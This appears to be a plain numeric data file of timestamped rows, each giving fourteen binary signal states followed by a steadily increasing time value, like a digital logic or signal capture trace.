0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7200668e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7200672e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7200692e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7200716e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7200740e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7200768e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7200792e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7200820e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7200840e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7200868e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7200892e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7200916e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7200924e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7200940e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7200968e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7200992e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7201016e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7201040e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7201064e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7201092e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7201116e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7201140e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7201164e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7201192e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7201212e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7201220e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7201240e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7201264e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7201272e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7201292e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7201316e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7201340e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7201364e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7201392e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7201412e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7201420e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7201440e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7201468e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7201492e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7201516e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7201540e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7201564e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7201592e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7201612e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7201624e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7201640e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7201668e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7201692e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7201716e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7201764e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7201792e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7201840e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7201868e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7201916e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7201940e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7201996e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7202016e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7202068e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7202092e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7202140e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7202164e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7202192e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7202212e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7202220e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7202240e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7202268e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7202272e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7202292e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7202316e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7202320e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7202340e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7202364e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7202392e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7202416e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7202440e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7202464e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7202472e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7202492e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7202516e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7202540e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7202564e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7202592e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7202612e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7202620e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7202640e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7202668e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7202692e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7202716e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7202740e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7202764e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7202792e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7202812e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7202840e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7202868e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7202872e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7202892e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7202916e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7202940e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7202964e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7202972e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7202992e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7203012e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7203040e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7203064e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7203092e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7203116e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7203140e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7203168e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7203192e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7203220e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7203224e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7203244e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7203268e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7203272e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7203292e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7203316e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7203324e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7203340e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7203368e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7203392e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7203420e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7203444e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7203468e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7203492e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7203516e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7203524e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7203540e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7203568e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7203572e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7203592e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7203620e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7203644e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7203668e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7203676e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7203692e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7203716e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7203740e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7203768e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7203792e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7203820e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7203844e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7203868e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7203872e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7203892e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7203916e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7203924e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7203940e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7203968e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7203992e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7204020e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7204044e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7204068e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7204092e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7204116e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7204140e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7204168e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7204192e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7204220e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7204224e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7204244e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7204268e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7204292e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7204316e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7204324e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7204340e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7204368e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7204372e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7204392e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7204420e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7204444e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7204468e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7204492e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7204516e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7204540e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7204568e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7204572e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7204592e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7204620e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7204624e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7204644e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7204668e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7204692e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7204716e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7204740e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7204768e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7204792e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7204820e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7204844e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7204868e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7204892e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7204916e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7204940e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7204968e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7204992e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7205020e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7205040e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7205068e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7205092e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7205116e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7205140e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7205168e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7205192e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7205220e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7205240e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7205268e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7205292e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7205316e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7205340e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7205368e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7205392e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7205420e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7205440e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7205468e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,3.7330132e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.7330344e-02 1,1,0,1,0,0,0,0,0,0,0,1,0,1,3.7330364e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.7330392e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.7330692e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.7330716e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.7330740e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.7330764e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.7330788e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.7330812e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.7330836e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.7330860e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.7330888e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.7330912e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.7330940e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7330964e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7330988e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331012e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331036e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331060e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331088e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331112e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331140e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331164e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331188e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331216e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331236e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331260e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331288e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331316e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331340e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331364e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331388e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331416e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331436e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331460e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331488e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331516e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331540e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331564e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331588e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331616e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331640e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331668e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331692e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331716e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331740e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331764e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331788e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331816e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331840e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331868e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331892e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331916e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331940e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7331964e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7331988e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7332016e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7332040e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7332068e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7332092e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7332116e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7332140e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7332164e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7332188e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7332216e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7332240e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7332268e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7332292e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7332316e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7332340e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7332364e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7332372e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7332388e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7332416e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7332440e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7332468e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7332492e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7332516e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7332540e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7332564e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7332588e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7332616e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7332640e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7332668e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7332692e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7332716e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7332740e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7332764e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7332788e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7332816e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7332840e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7332868e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7332892e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7332916e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7332940e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7332964e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7332988e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7333016e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7333040e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7333068e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7333092e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7333116e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7333140e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7333164e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7333188e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7333216e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7333240e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7333268e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7333292e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7333316e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7333340e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7333364e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7333388e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7333412e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7333440e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7333460e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7333468e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7333492e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7333516e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7333540e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7333564e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7333588e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7333616e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7333636e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7333660e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7333688e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7333716e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.7333740e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.7333764e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7333772e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7333788e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7333812e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7333836e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7333860e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7333888e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7333912e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7333940e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7333964e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7333988e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334012e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334036e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334060e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334088e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334112e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334140e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334160e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334188e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334212e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334236e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334260e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334288e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334312e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334336e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334360e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334388e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334412e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334436e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334460e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334484e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334512e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334536e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334560e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334588e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334612e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334636e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334660e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334684e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334712e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334736e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334760e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334788e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334812e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334836e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334860e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334884e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334912e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334936e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7334960e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7334988e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335012e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335036e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335060e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335084e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335108e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335136e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335160e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335188e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335212e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335236e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.7335260e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.7335284e-02 